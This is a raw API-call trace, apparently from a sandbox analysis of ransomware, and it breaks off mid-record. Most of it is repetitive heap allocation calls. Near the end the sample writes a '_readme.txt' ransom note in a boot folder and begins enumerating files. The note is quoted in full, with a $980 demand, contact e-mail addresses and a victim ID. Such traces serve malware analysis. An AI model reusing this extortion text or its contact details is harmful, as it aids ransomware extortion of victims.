[0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.842] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.842] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.843] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.844] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.845] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.847] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.847] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0209.847] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.847] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.847] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.847] PathFindFileNameW (pszPath="") returned="" [0209.847] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.848] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.848] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.848] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.848] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.848] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.848] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.848] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0209.848] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0209.849] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.849] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.849] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.849] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.849] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.849] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.849] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.850] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.850] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.850] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, 